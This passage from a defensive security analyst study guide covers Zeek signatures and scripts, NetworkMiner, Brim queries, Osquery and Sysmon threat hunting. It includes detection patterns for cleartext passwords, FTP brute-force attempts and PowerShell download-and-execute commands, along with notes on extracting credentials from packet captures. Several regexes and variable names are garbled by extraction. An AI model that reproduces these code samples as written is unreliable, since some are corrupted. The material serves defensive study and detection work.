Below command shows how to use a signature file while
analyzing a PCAP
 zeek -C -r sample.pcap -s sample.sig
Example Signature | Cleartext Submission of Password
The rule will match when a "password" phrase is detected
in the packet payload. Once the match occurs, Zeek will
generate an alert and create additional log files
(signatures.log and notice.log).
 signature http-password {
 ip-proto == tcp
 dst-port == 80
 payload /.*|áª_.*/
 event "Cleartext Password Found!"
 }
 #   signature: Signature name.
 #   ip-proto: Filtering TCP connection.
 #   dst-port: Filtering destination port 80.
 #   payload: Filtering the "password" phrase.
 #   event: Signature match message.
Example Signature| FTP Brute-force
This time, we will use the FTP content filter to investigate
command-line inputs of the FTP traffic. The aim is to
detect FTP "admin" login attempts. This basic signature
will help us identify the admin login attempts and have an
idea of possible admin account abuse or compromise
events.
                            335 / 547
                          HTB CDSA
 signature ftp-admin
 {
 ip-proto == tcp
 ftp /.**.*áU0V.*/
 event "FTP Admin Login Attempt!"
 }
Or you can tweak the signature to create logs for each
event containing "FTP 530 response", which allows us to
track the login failure events regardless of username.
This rule should show us two types of alerts and help us
to correlate the events by having "FTP Username Input"
and "FTP Brute-force Attempt" event messages.
 signature ftp-username
 {
 ip-proto == tcp
 ftp /.**.*áU0V.*/
 event "FTP Admin Login Attempt!"
 }
 signature ftp-admin
 {
 ip-proto == tcp
 payload /.*530.*e_!0V.*0Vý_ ý.*/
                           336 / 547
                           HTB CDSA
 event "FTP Brute-force Attempt"
 }
Zeek Scripts
Zeek has its own event-driven scripting language, which
is as powerful as high-level languages and allows us to
investigate and correlate the detected events.
     Zeek scripts use the ".zeek" extension.
     Do not modify anything under the
     "/opt/zeek/share/zeek/base" directory. User-
     generated and modified scripts should be in the
     "/opt/zeek/share/zeek/site" directory.
     You can call scripts in live monitoring mode by
     loading them with the command  load
     @/script/path or      load @script-
     name in local.zeek   file.
     Zeek is event-oriented, not packet-oriented! We
     need to use/write scripts to handle the event of
     interest.
     Example Script | DHCP Hosts Extraction
     Here the first, second and fourth lines are the
     predefined syntaxes of the scripting language. The
     only part we created is the third line which
     tells Zeek to extract DHCP hostnames.
 event dhcp_message (c: connection, is_orig:
 bool, msg: DHCP::Msg, options: DHCP::Options)
 {
                           337 / 547
                             HTB CDSA
 print options$host_name;
 }
Then the script can be invoked from the command line
 zeek -C -r smallFlows.pcap dhcp-hostname.zeek
Note that Zeek scripting is a programming language itself,
and we are not covering the fundamentals of Zeek
scripting. You can learn and practice the Zeek scripting
language by using Zeek's official training platform for
free.
You can also load all local scripts identified in your
"local.zeek" file. Note that base scripts cover multiple
framework functionalities. You can load all base scripts by
easily running the   local   command.
 zeek -C -r ftp.pcap local
Loaded scripts generates log files such as
loaded_scripts.log, capture_loss.log, notice.log,
stats.log,etc. However, Zeek doesn't provide log files for
the scripts doesn't have hits or results.
Zeek has an FTP brute-force detection that can be invoked
from the command line by specifying its path.
 zeek -C -r ftp.pcap
 /opt/zeek/share/zeek/policy/protocols/ftp/dete
 ct-bruteforcing.zeek
                             338 / 547
                            HTB CDSA
Signatures with Scripts
We can use scripts collaboratively with other scripts and
signatures to get one step closer to event
correlation. Zeek scripts can refer to signatures and
other Zeek scripts as well. This flexibility provides a
massive advantage in event correlation.
The below basic script quickly checks if there is a
signature hit and provides terminal output to notify us. We
are using the "signature_match" event to accomplish this.
You can read more about events here. Note that we are
looking only for "ftp-admin" signature hits.
 event signature_match (state: signature_state,
 msg: string, data: string)
 {
 if (state$sig_id == "ftp-admin")
 {
 print ("Signature hit! -- #FTP-Admin ");
 }
 }
The signature is shown below.
 signature ftp-admin {
 ip-proto == tcp
 ftp /.**.*áU0V.*/
 event "FTP Username Input Found!"
 }
Combined together
                            339 / 547
                           HTB CDSA
 zeek -C -r ftp.pcap -s ftp-admin.sig 201.zeek
Zeek Frameworks
Frameworks are used in Zeek scripts to extend its
functionality and provider further event analysis,
extraction and correlation.
Frameworks are called inside scripts by using   load
keyword and specifying the framework path     load @
$PATH/base/frameworks/framework-name .          Below is an
example of a script that calls a file hash framework to
create hashes of the extracted files from a given PCAP.
 # Enable MD5, SHA1 and SHA256 hashing for all
 files.
 @load base/files/hash
 event file_new(f: fa_file)
 {
 Files::add_analyzer(f, Files::ANALYZER_MD5);
 Files::add_analyzer(f, Files::ANALYZER_SHA1);
 Files::add_analyzer(f,
 Files::ANALYZER_SHA256);
 }
Then from the command line, we can call the framework
 zeek -C -r case1.pcap
 /opt/zeek/share/zeek/policy/frameworks/files/h
                            340 / 547
                             HTB CDSA
 ash-all-files.zeek
Zeek Package Manager
Zeek Package Manager helps users install third-party
scripts and plugins to extend Zeek functionalities with
ease. The package manager is installed with Zeek and
available with the   zkg   command. Users can install,
load, remove, update and create packages with the "zkg"
tool. You can read more on and view available
packages here and here. Please note that you need root
privileges to use the "zkg" tool.
There are multiple ways of using packages. The first
approach is using them as frameworks and calling specific
package path/directory per usage.
 zeek -Cr http.pcap
 /opt/zeek/share/zeek/site/package-name
The second and most common approach is calling packages
from a script with the "@load" method inside a script
 @load /opt/zeek/share/zeek/site/zeek-sniffpass
The third and final approach to using packages is calling
their package names; note that this method works only
for packages installed with the "zkg" install method.
 zeek -Cr http.pcap zeek-sniffpass
                             341 / 547
                            HTB CDSA
Install a package. Example (zkg install zeek/j-
gras/zeek-af_packet-plugin)
 zkg install package_path
Install package. Example (zkg install
KWWSV     J LWKXE FRP FRUHOLJ KW ] WHVW)
 zkg install git_url
List installed package
 zkg list
Remove installed package
 zkg remove
Check version updates for installed packages
 zkg refresh
Update installed packages
 zkg upgrade
Network Miner
Definition
                            342 / 547
                             HTB CDSA
NetworkMiner is an open source Network Forensic Analysis
Tool (NFAT) for Windows (but also works in Linux / Mac
OS X / FreeBSD).
NetworkMiner can be used as a passive network
sniffer/packet capturing tool to detect operating systems,
sessions, hostnames, open ports etc. without putting any
traffic on the network.
Network Miner can also parse PCAP files for off-line
analysis and to regenerate/reassemble transmitted files
and certificates from PCAP files.
Use Cases of Network Miner
     Traffic sniffing: It can intercept the traffic, sniff it,
     and collect and log packets that pass through the
     network.
     Parsing PCAP files: It can parse pcap files and show
     the content of the packets in detail.
     Protocol analysis: It can identify the used protocols
     from the parsed pcap file.
     OS fingerprinting: It can identify the used OS by
     reading the pcap file. This feature strongly relies
     on Satori and p0f.
      File Extraction: It can extract images, HTML files
     and emails from the parsed pcap file.
     Credential grabbing: It can extract credentials from
     the parsed pcap file.
     Clear text keyword parsing: It can extract cleartext
     keywords and strings from the parsed pcap file.
Operating Modes
                             343 / 547
                           HTB CDSA
     Sniffer Mode: Although it has a sniffing feature, it is
     not intended to use as a sniffer. The sniffier feature
     is available only on Windows. However, the rest of
     the features are available in Windows and Linux OS.
     Based on experience, the sniffing feature is not as
     reliable as other features. Therefore we suggest not
     using this tool as a primary sniffer. Even the official
     description of the tool mentions that this tool is a
     "Network Forensics Analysis Tool", but it can be
     used as a "sniffer". In other words, it is a Network
     Forensic Analysis Tool with but has a sniffer feature,
     but it is not a dedicated sniffer like Wireshark and
     tcpdump.
     Packet Parsing/Processing: Network Miner can parse
     traffic captures to have a quick overview and
     information on the investigated capture. This
     operation mode is mainly suggested to grab the "low
     hanging fruit" before diving into a deeper
     investigation.
Tool Components
File Menu
The file menu helps you load a Pcap file or receive Pcap
over IP. You can also drag and drop pcap files as well.
NetworkMiner also can receive Pcaps over IP. This room
suggests using NetworkMiner as an initial investigation
tool for low hanging fruit grabbing and traffic overview.
Therefore, we will skip receiving Pcaps over IP in this
room. You can read on receiving Pcap over IP
from here and here.
Tools Menu
The tools menu helps you clear the dashboard and remove
                            344 / 547
                          HTB CDSA
the captured data.
Case Panel
The case panel shows the list of the investigated pcap
files. You can reload/refresh, view metadata details and
remove loaded files from this panel.
Hosts
The "hosts" menu shows the identified hosts in the pcap
file. This section provides information on;
     IP address
     MAC address
     OS type
     Open ports
     Sent/Received packets
                           345 / 547
                      HTB CDSA
Incoming/Outgoing sessions
Host details
OS fingerprinting uses the Satori GitHub repo and p0f,
and the MAC address database uses the mac-ages
GitHub repo.
You can sort the identified hosts by using the sort
menu. You can change the colour of the hosts as
well. Some of the features (OSINT lookup) are
available only in premium mode. The right-click menu
also helps you to copy the selected value.
Sessions
The session menu shows detected sessions in the
pcap file. This section provides information on;
Frame number
Client and server address
Source and destination port
Protocol
Start time
You can search for keywords inside frames with the
help of the filtering bar. It is possible to filter
specific columns of the session menu as well. This
menu accepts four types of inputs;
"ExactPhrase"
"AllWords"
"AnyWord"
"RegExe"
DNS
                      346 / 547
                       HTB CDSA
The DNS menu shows DNS queries with details. This
section provides information on;
Frame number
Timestamp
Client and server
Source and destination port
IP TTL
DNS time
Transaction ID and type
DNS query and answer
Alexa Top 1M
Credentials
The credentials menu shows extracted credentials
and password hashes from investigated pcaps. You
can use Hashcat (GitHub) and John the
Ripper (GitHub) to decrypt extracted credentials.
NetworkMiner can extract credentials including;
Kerberos hashes
NTLM hashes
                       347 / 547
                      HTB CDSA
RDP cookies
HTTP cookies
HTTP requests
IMAP
FTP
SMTP
MS SQL
The right-click menu is helpful in this part as well.
You can easily copy the username and password
values.
Files
The file menu shows extracted files from
investigated pcaps. This section provides information
on;
Frame number
Filename
Extension
Size
Source and destination address
Source and destination port
Protocol
                       348 / 547
                      HTB CDSA
Timestamp
Reconstructed path
Details
Some features (OSINT hash lookup and sample
submission) are available only in premium mode. The
search bar is available here as well. The right-click
menu is helpful in this part as well. You can easily
open files and folders and view the file details in-
depth.
Images
The file menu shows extracted images from
investigated pcaps. The right-click menu is helpful in
                      349 / 547
                      HTB CDSA
this part as well. You can open files and zoom in &
out easily.
Once you hover over the image, it shows the file's
detailed information (source & destination address
and file path).
Parameters
The file menu shows extracted parameters from
investigated pcaps. This section provides information
on;
Parameter name
Parameter value
Frame number
Source and destination host
Source and destination port
Timestamp
Details
The right-click menu is helpful in this part as well.
You can copy the parameters and values easily.
Keywords
                       350 / 547
                      HTB CDSA
The file menu shows extracted keywords from
investigated pcaps. This section provides information
on;
Frame number
Timestamp
Keyword
Context
Source and destination host
source and destination port
How to filter keywords;
Add keywords
Reload case files!
Note: You can filter multiple keywords in this
section; however, you must reload the case files
after updating the search keywords. Keyword search
investigates all possible data in the processed
pcaps.
                      351 / 547
                      HTB CDSA
Messages
The messages menu shows extracted emails, chats
and messages from investigated pcaps. This section
provides information on;
Frame number
Source and destination host
Protocol
Sender (From)
Receiver (To)
Timestamp
Size
Once you filter the traffic and get a hit, you will
discover additional details like attachments and
attributes on the selected message. Note that the
search bar is available here as well. The right-click
menu is available here. You can use the built-in
viewer to investigate overall information and the
"open file" option to explore attachments.
Anomalies
The anomalies menu shows detected anomalies in the
                       352 / 547
                            HTB CDSA
     processed pcap. Note that NetworkMiner isn't
     designated as an IDS. However, developers added
     some detections for EternalBlue exploit and spoofing
     attempts.
Brim
Definition
BRIM is an open-source desktop application that processes
pcap files and logs files. Its primary focus is providing
search and analytics. It uses the Zeek log processing
format. It also supports Zeek signatures and Suricata
Rules for detection.
Input Formats
     Packet Capture Files: Pcap files created with
     tcpdump, tshark and Wireshark like applications.
     Log Files: Structured log files like Zeek logs.
     In the below screenshot, we can see:
     Pools: Data resources, investigated pcap and log
     files.
     Queries: List of available queries. Queries help us to
     correlate finding and find the event of the interest.
     Queries can have names, tags and descriptions.
     Query library lists the query names, and once you
     double-click, it passes the actual query to the
     search bar. You can double-click on the query and
     execute it with ease. Once you double-click on the
     query, the actual query appears on the search bar
     and is listed under the history tab.
                            353 / 547
                      HTB CDSA
History: List of launched queries.
The timeline provides information about capture start
and end dates.
The rest of the log details are shown in the right
pane and provides details of the log file fields. Note
that you can always export the results by using the
export function located near the timeline.
Below,you can correlate each log entry by reviewing
the correlation section at the log details pane
(shown on the left image). This section provides
information on the source and destination addresses,
duration and associated log files. This quick
information helps you answer the "Where to look
next?" question and find the event of interest and
                       354 / 547
                             HTB CDSA
     linked evidence.
Queries in Detail
Reviewing Overall Activity
This query provides general information on the pcap file.
The provided information is valuable for accomplishing
further investigation and creating custom queries. It is
impossible to create advanced or case-specific queries
without knowing the available log files.
The image on the left shows that there are 20 logs
generated for the provided pcap file.
                             355 / 547
                            HTB CDSA
Windows Specific Networking Activity
This query focuses on Windows networking activity and
details the source and destination addresses and named
pipe, endpoint and operation detection. The provided
information helps investigate and understand specific
Windows events like SMB enumeration, logins and service
exploiting.
Unique Network Connections and Transferred Data
These two queries provide information on unique
connections and connection-data correlation. The provided
info helps analysts
detect weird and malicious connections and suspicious
and beaconing activities. The uniq list provides a clear list
of unique connections that help identify anomalies. The
data list summarizes the data transfer rate that supports
                            356 / 547
                            HTB CDSA
the anomaly investigation hypothesis.
DNS and HTTP Methods
These queries provide the list of the DNS queries and HTTP
methods. The provided information helps analysts to
detect anomalous DNS and HTTP traffic. You can also
narrow the search by viewing the "HTTP POST" requests
with the available query and modifying it to view the
"HTTP GET" methods.
File Activity
This query provides the list of the available files. It helps
analysts to detect possible data leakage attempts and
suspicious file activity. The query provides info on the
detected file MIME and file name and hash values (MD5,
SHA1).
IP Subnet Statistics
This query provides the list of the available IP subnets. It
helps analysts detect possible communications outside the
scope and identify out of ordinary IP addresses.
Suricata Alerts
These queries provide information based on Suricata rule
results. Three different queries are available to view the
available logs in different formats (category-based,
                             357 / 547
                           HTB CDSA
source and destination-based, and subnet based).
Custom Queries
Example of custom query
Below we can use the   _path       keyword to specify a log
file to search. Notice we used the operator     ==   and the
|   to pipe the output to another command      cut   which
allows us to display and select certain fields.
                            358 / 547
                           HTB CDSA
 _path=="conn" | cut geo.resp.country_code,
 geo.resp.region, geo.resp.city
Basic search
Find logs containing an IP address or any value.
 10.0.0.1
Logical operators
 Or, And, Not.
Filter values
 "field name" == "value"
Count field values
 count () by "field"
Count the number of the available log files and sort
recursively.
 count () by _path | sort -r
Cut specific field from a log file
 _path=="conn" | cut "field name"
List unique values
                           359 / 547
                            HTB CDSA
 uniq
Investigative Queries
Communicated Hosts
This approach will help analysts to detect possible access
violations, exploitation attempts and malware infections.
 _path=="conn" | cut id.orig_h, id.resp_h |
 sort | uniq
Frequently Communicated Hosts
This will help security analysts to detect possible data
exfiltration, exploitation and backdooring activities.
 _path=="conn" | cut id.orig_h, id.resp_h |
 sort | uniq -c | sort -r
Most Active Ports
Investigating the most active ports will help analysts to
detect silent and well-hidden anomalies by focusing on the
data bus and used services.
[1]
  _path=="conn" | cut id.resp_p, service | sort
 | uniq -c | sort -r count
[2]
 _path=="conn" | cut id.orig_h, id.resp_h,
 id.resp_p, service | sort id.resp_p | uniq -c
                            360 / 547
                           HTB CDSA
 | sort -r
Long Connections
For security analysts, the long connections could be the
first anomaly indicator. If the client is not designed to
serve a continuous service, investigating the connection
duration between two IP addresses can reveal possible
anomalies like backdoors.
 _path=="conn" | cut id.orig_h, id.resp_p,
 id.resp_h, duration | sort -r duration
Transferred Data
Another essential point is calculating the transferred data
size. If the client is not designed to serve and receive
files and act as a file server, it is important to
investigate the total bytes for each connection. Thus,
analysts can distinguish possible data exfiltration or
suspicious file actions like malware downloading and
spreading.
 _path=="conn" | put total_bytes := orig_bytes
 + resp_bytes | sort -r total_bytes | cut uid,
 id, orig_bytes, resp_bytes, total_bytes
DNS and HTTP Queries
Identifying suspicious and out of ordinary domain
connections and requests is another significant point for a
security analyst. Abnormal connections can help
detect C2 communications and possible
compromised/infected hosts. Identifying the
suspicious DNS queries and HTTP requests help security
                            361 / 547
                            HTB CDSA
analysts to detect malware C2 channels and support the
investigation hypothesis.
[1]
 _path=="dns" | count () by query | sort -r
[2]
 _path=="http" | count () by uri | sort -r
Suspicious Hostnames
Identifying suspicious and out of ordinary hostnames helps
analysts to detect rogue hosts. Investigating
the DHCP logs provides the hostname and domain
information.
 _path=="dhcp" | cut host_name, domain
Suspicious IP Addresses
 _path=="conn" | put classnet :=
 network_of(id.resp_h) | cut classnet | count()
 by classnet | sort -r
Detect Files
 filename!=null
SMB Activity
Another significant point is investigating the SMB activity.
This will help analysts to detect possible malicious
                            362 / 547
                           HTB CDSA
activities like exploitation, lateral movement and malicious
file sharing.
 _path=="dce_rpc" OR _path=="smb_mapping" OR
 _path=="smb_files"
Known Patterns
Known patterns represent alerts generated by security
solutions. These alerts are generated against the common
attack/threat/malware patterns and known by endpoint
security products, firewalls and IDS/IPS solutions. This
data source highly relies on available signatures, attacks
and anomaly patterns. Investigating available log sources
containing alerts is vital for a security analyst.
Brim supports the Zeek and Suricata logs, so any anomaly
detected by these products will create a log file.
Investigating these log files can provide a clue where the
analyst should focus.
 event_type=="alert" or _path=="notice" or
 _path=="signatures"
Module 5: Endpoint Security and
Monitoring
OSquery
Definition
Osquery is an open-source agent that converts the
operating system into a relational database. It allows us
                            363 / 547
                            HTB CDSA
to ask questions from the tables using SQL queries, like
returning the list of running processes, a user account
created on the host, and the process of communicating
with certain suspicious domains.
The SQL language implemented in Osquery is not an entire
SQL language that you might be accustomed to, but rather
it's a superset of SQLite.
Realistically all your queries will start with
a SELECT statement. This makes sense because, with
Osquery, you are only querying information on an
endpoint. You won't be updating or deleting any
information/data on the endpoint.
In Osquery, all commands are prefixed with [.].
Investigation methodology
When it comes to investigating an endpoint with Qsquery,
we follow the below order
     List the tables in the current osquery installed on the
     end point
     we highlight the table which contains the aspect of
     windows we want to investigate. Example is
     investigating processes so we would be looking the
     table that contains information about processes
     We search for the table
     Display the schema and columns
     Start the investigation by displaying and querying
     data using   SELECT   statement.
Entering the interactive mode
                            364 / 547
                      HTB CDSA
osqueryi
Display the help menu
.help
Displaying version and other values for
the current settings
.show
Change output mode
.mode [mode]
modes:
list
pretty
line
column
csv
Querying the version of os query
installed on a windows endpoint
.table osquery_info
Checking the available tables
                      365 / 547
                           HTB CDSA
 .tables
Displaying tables containing specific
aspect of windows
This is useful if you want to list and search the tables
associated with processes, users,.etc
 .tables user
 .tables process
 .tables network
Displaying and querying the columns of
a table
 .schema table_name
Display information about running
processes
Assuming the table that contains details about processes
is   processes
 SELECT * FROM processes;
We can also query specific columns from the table
processes
Example [1]
                            366 / 547
                             HTB CDSA
 SELECT pid, name, path FROM processes;
Example [2]
 SELECT pid, name, path FROM processes WHERE
 name='lsass.exe';
Display number of running processes
The   count(*)    can be used to display the count or
number of entries for any table. Below is an example for
the   processes   table
 SELECT count(*) from processes;
Join the results of two tables. It
requires on common column
OSquery can also be used to join two tables based on a
column that is shared by both tables
 SELECT pid, name, path FROM osquery_info JOIN
 processes USING (pid);
Investigate services such as windows
defender
 select name,description from services where
 name like "WinD%";
                             367 / 547
                            HTB CDSA
Investigate windows defender logs
 osquery> select eventid,datetime from
 win_event_log_data where source =
 "Applications and Services Logs-Microsoft-
 Windows-Windows Defender/Operational" and
 eventid like '1116' ;
Investigate sysmon logs
 select eventid from win_event_log_data where
 source="Microsoft-Windows-Sysmon/Operational"
 order by datetime limit 1;
Investigate Browsers
Investigating Chrome Extensions
First, we list the schema (table description) of
the chrome_extensions table.
 .schema chrome_extensions
Based on the output, lets say we are interested in
identifier    and   name   from the table;
 SELECT identifier as id, name FROM
 chrome_extensions;
Links
                             368 / 547
                           HTB CDSA
     https://osquery.io/schema/
     https://github.com/trailofbits/osquery-
     extensions/blob/master/README.md
     https://osquery.readthedocs.io/en/stable/
Sysmon
Definition
Sysmon (System Monitor) is a Windows system service
and driver developed by Microsoft as part of the
Sysinternals suite. Sysmon provides advanced logging of
Windows system events, including process creation,
network connections, file creation, and registry
modifications. These logs are invaluable for detecting
suspicious behavior, conducting forensic investigations,
and improving overall endpoint security.
Sysmon operates by monitoring and logging activity at a
granular level, which it then outputs to Windows Event
Logs, making it possible to centralize and analyze logs
using tools like SIEMs (e.g., Splunk, ELK Stack) or local
analysis with Windows Event Viewer.
What Can You Do with Sysmon?
     Process Creation Logging: Captures detailed
     information about each process, including command-
     line arguments.
     Network Connection Logging: Tracks incoming and
     outgoing connections, showing source and
     destination IP addresses and ports.
                           369 / 547
                             HTB CDSA
     File Creation and Time Change Events: Logs the
     creation of new files and any changes to file
     timestamps.
     Registry Monitoring: Tracks changes to the registry,
     an area often targeted by malware.
     DLL Loading: Logs Dynamic Link Library (DLL) loads
     by each process, which can help detect malicious
     code injection.
How to Install and Configure Sysmon
Here’s a step-by-step guide on installing and configuring
Sysmon on Windows.
Step 1: Download Sysmon
    1. Visit the Sysinternals Suite website.
    2. Download the Sysmon zip file and extract it to a
       preferred directory on your system.
Step 2: Install Sysmon
Sysmon installation requires specifying a configuration file
that defines the types of events to log. Sysmon can run
with or without a config file, but using one is
recommended to fine-tune what Sysmon will monitor and
log.
     Basic installation command (without a config file):
 sysmon -accepteula -i
Installation with a configuration file:
                             370 / 547
                            HTB CDSA
 sysmon -accepteula -i sysmonconfig.xml
This command installs Sysmon and starts it with the
configuration file specified (   sysmonconfig.xml ).
Step 3: Create or Download a Configuration
File
A configuration file tells Sysmon what to log and how to
filter events. You can create one from scratch, but there
are several community configurations optimized for
security logging. One popular configuration file is from
SwiftOnSecurity, which provides an optimized configuration
that includes filtering for common noise and logs important
events.
    1. SwiftOnSecurity’s Sysmon Config:
            Visit SwiftOnSecurity’s SysmonConfig GitHub
            page.
            Download the latest version of the XML file.
    2. Modify Configuration as Needed:
            Open the configuration file in a text editor and
            modify as needed. The config defines which
            processes, connections, file changes, and
            registry modifications to monitor.
Step 4: Start Sysmon with the
Configuration File
Once you have the configuration file ready, install Sysmon
with it:
                             371 / 547
                             HTB CDSA
 sysmon -accepteula -i sysmonconfig.xml
Step 5: Verify Sysmon Installation
   1. Open Event Viewer:
             Go to Windows Logs > Applications and
              Services Logs > Microsoft > Windows                >
              Sysmon .
   2. Check for events to ensure Sysmon is running and
      logging as expected. Sysmon events are prefixed
      with “Sysmon Event” in Event Viewer.
Configuring and Tuning Sysmon
The configuration file can be modified to customize which
events Sysmon logs, filtering out noisy events, and
focusing on relevant security activities. Here are some
useful configuration options:
   1. Process Creation (    Event ID 1 ):   Logs every time
      a process is created.
             Useful fields include  ProcessId , Image
             (path to   executable), and CommandLine       (full
             command used).
   2. Network Connections (       Event ID 3 ):   Captures all
      network connection events.
             Logs details like SourceIp ,
               DestinationIp , SourcePort , and
               DestinationPort .
   3. File   Creation Time Change ( Event ID 2 ): Detects
      timestamp changes on files, often used by malware
                             372 / 547
                             HTB CDSA
       to cover tracks.
    4. Registry Events (   Event ID 12, 13, 14 ):
       Monitors registry changes, including key and value
       modifications.
    5. File Creation (   Event ID 11 ):   Logs new files
       created on the system.
    6. Image Loading (    Event ID 7 ):   Logs DLL loads for
       each process, useful for detecting code injection
       attacks.
Example Configuration Snippet
Here is a simplified snippet to include in the XML file:
 Sysmon schemaversion"Î.ÏÊ"
     EventFiltering
         <!-- Process Creation -->
         ProcessCreate onmatch"include"
             CommandLine
 condition"contains"powershell/CommandLine
             CommandLine
 condition"contains"cmd.exe/CommandLine
         /ProcessCreate
         <!-- Network Connection -->
         NetworkConnect onmatch"include"
             DestinationIp
 condition"is"192.168.1.100/DestinationIp
         /NetworkConnect
                              373 / 547
                           HTB CDSA
         <!-- Registry Modification -->
         RegistryEvent onmatch"exclude"
             TargetObject
 condition"contains"\Software\Microsoft\Windo
 ws\CurrentVersion\Run/TargetObject
         /RegistryEvent
     /EventFiltering
 /Sysmon
Updating Sysmon
To update Sysmon with a new configuration:
 sysmon -c sysmonconfig.xml
This command updates Sysmon without reinstalling it,
applying the new configuration immediately.
Uninstalling Sysmon
If you need to uninstall Sysmon, use:
This will completely remove Sysmon from your system,
including all logs and configuration settings.
Creating Alerts for High-Value Events
Once Sysmon is running, configure alerts for specific
events that often indicate malicious activity. Here are
some key alerts to consider:
Process Creation Alerts
                            374 / 547
                        HTB CDSA
   PowerShell Execution: PowerShell is often used in
   attacks, so monitor for PowerShell usage with
   suspicious command-line arguments (e.g.,     -
   EncodedCommand ).
   Unusual Parent-Child Processes: Alert on uncommon
   parent-child process relationships, such as
   winword.exe    spawning       powershell.exe ,   which
   may indicate document-based malware.
   Example PowerShell query for PowerShell abuse:
Get-WinEvent -LogName "Microsoft-Windows-
Sysmon/Operational" |
    Where-Object { $_.Id -eq 1 -and $_.Message
-match "powershell" -and $_.Message -match "-
EncodedCommand" }
Network Connection Alerts
   Suspicious Outbound Connections: Look for
   connections to high-risk IPs, unusual destinations,
   or unexpected protocols.
   Uncommon Ports: Alert on outbound connections over
   uncommon ports (e.g., non-standard ports for
   HTTP/HTTPS), which can indicate C2 communication
   or data exfiltration.
   Example PowerShell query for suspicious network
   connections:
Get-WinEvent -LogName "Microsoft-Windows-
Sysmon/Operational" |
                         375 / 547
                            HTB CDSA
     Where-Object { $_.Id -eq 3 -and $_.Message
 -match "ExternalIPAddress" }
Replace   "ExternalIPAddress"           with a known malicious
IP or IP range.
Registry Modification Alerts
Monitor registry changes in keys related to persistence,
such as
HKCU\Software\Microsoft\Windows\CurrentVersion\R
un .
Example PowerShell query for autorun registry
modifications:
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -in 12, 13, 14 -and
 $_.Message -match "CurrentVersion\\Run" }
Parsing Sysmon Logs with Powershell
The   Get-Sysmonlogs    command is not an official cmdlet
but typically refers to using PowerShell to retrieve and
parse Sysmon logs from Windows Event Viewer. Since
Sysmon logs are stored in Event Viewer under
"Applications and Services Logs > Microsoft > Windows >
Sysmon", we can use PowerShell’s           Get-WinEvent   to
access and filter these logs efficiently.
1. Basic Retrieval of Sysmon Logs
                            376 / 547
                           HTB CDSA
To retrieve all Sysmon logs, use:
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational"
This command pulls all events from the Sysmon log.
2. Filter Sysmon Logs by Event ID
Sysmon uses specific event IDs for different types of
activities, such as process creation, network connection,
registry changes, etc. You can filter logs by these IDs to
retrieve specific types of events.
For example, to retrieve process creation events (     Event
ID 1 ):
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" | Where-Object {$_.Id -eq
 1}
Or for network connection events (     Event ID 3 ):
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" | Where-Object {$_.Id -eq
 3}
3. Retrieve Sysmon Logs within a Specific
Date Range
To get Sysmon logs within a specific date range, use the
-FilterHashtable     parameter:
                           377 / 547
                           HTB CDSA
 $aDa = (Get-Date).AddDays(-7)            # 7 days
 ago
 $ VDa = Get-Date
 Get-WinEvent -FilterHashtable @{ LogName =
 "Microsoft-Windows-Sysmon/Operational";
 StartTime = $aDa ; EndTime = $ VDa }
This will retrieve logs from the last seven days.
4. Filter Sysmon Logs by Keywords
You can filter Sysmon logs to include only entries
containing specific keywords, such as "powershell" or
"cmd.exe" in command-line activity. Here’s how:
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Message -match
 "powershell" }
5. Display Sysmon Logs in a Table
To make the output more readable, format it in a table
view:
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Select-Object TimeCreated, Id, Message |
     Format-Table -AutoSize
                            378 / 547
                            HTB CDSA
6. Export Sysmon Logs to a CSV File
If you need to analyze Sysmon logs further or share them,
you can export them to a CSV file:
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Select-Object TimeCreated, Id, Message |
     Export-Csv -Path "C:\SysmonLogs.csv" -
 NoTypeInformation -Encoding UTF8
This saves the Sysmon logs with the timestamp, event ID,
and message details to a file named         SysmonLogs.csv .
7. Example: Advanced Filtering with
Multiple Conditions
To filter Sysmon logs for network connections (      Event ID
3)   where the destination IP is        192.168.1.10 :
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -eq 3 -and $_.Message
 -match "192.168.1.10" }
Automating with a Script
 # Define the time range for the past 24 hours
 $aDa = (Get-Date).AddDays(-1)
 $ VDa = Get-Date
                            379 / 547
                           HTB CDSA
 # Retrieve Sysmon logs for the last 24 hours
 and export to CSV
 Get-WinEvent -FilterHashtable @{ LogName =
 "Microsoft-Windows-Sysmon/Operational";
 StartTime = $aDa ; EndTime = $ VDa } |
     Select-Object TimeCreated, Id, Message |
     Export-Csv -Path "C:\SysmonLogs_24hrs.csv"
 -NoTypeInformation -Encoding UTF8
 Write-Output "Sysmon logs for the last 24
 hours have been exported to
 C:\SysmonLogs_24hrs.csv"
Threat Hunting with Sysmon
Threat hunting with Sysmon involves proactively searching
for indicators of compromise (IoCs), suspicious
behaviors, and potential security incidents using the rich
data that Sysmon logs. This process helps identify
stealthy or advanced attacks that may bypass traditional
security defenses.
Sysmon logs several events that are particularly useful for
threat hunting. Knowing these event types helps narrow
down searches and prioritize indicators.
     Event ID 1: Process Creation – Logs detailed
     information about each process creation event.
     Useful for detecting suspicious commands and tools.
     Event ID 3: Network Connection – Captures outgoing
     network connections. Essential for spotting
                            380 / 547
                           HTB CDSA
     communication with potential command and control
     (C2) servers.
     Event ID 7: Image Loaded – Logs DLLs loaded by
     processes. Good for detecting code injection
     techniques.
     Event ID 10: Process Access – Tracks processes
     accessing or modifying other processes. Useful for
     detecting process hollowing or similar attacks.
     Event ID 11: File Creation – Logs newly created files,
     which may indicate malware or unauthorized
     software installation.
     Event ID 12, 13, 14: Registry Modifications – Logs
     registry key creation, deletion, and modifications,
     useful for detecting persistence techniques.
     Event ID 19 and 20: WMI Event Filter and Consumer –
     Logs Windows Management Instrumentation (WMI)
     actions, often used for lateral movement.
Hunting for PowerShell Abuse
PowerShell is frequently abused by attackers for executing
malicious code. You can look for instances of PowerShell
being run with suspicious arguments.
 Get-WinEvent -LogName "Microsoft-Windows-
 Sysmon/Operational" |
     Where-Object { $_.Id -eq 1 -and $_.Message
 -match "powershell" -and $_.Message -match "
 (Invoke-WebRequest|Invoke-
 Expression|IEX|DownloadString)" }
                           381 / 547
                           HTB CDSA
Detecting Suspicious Network Connections
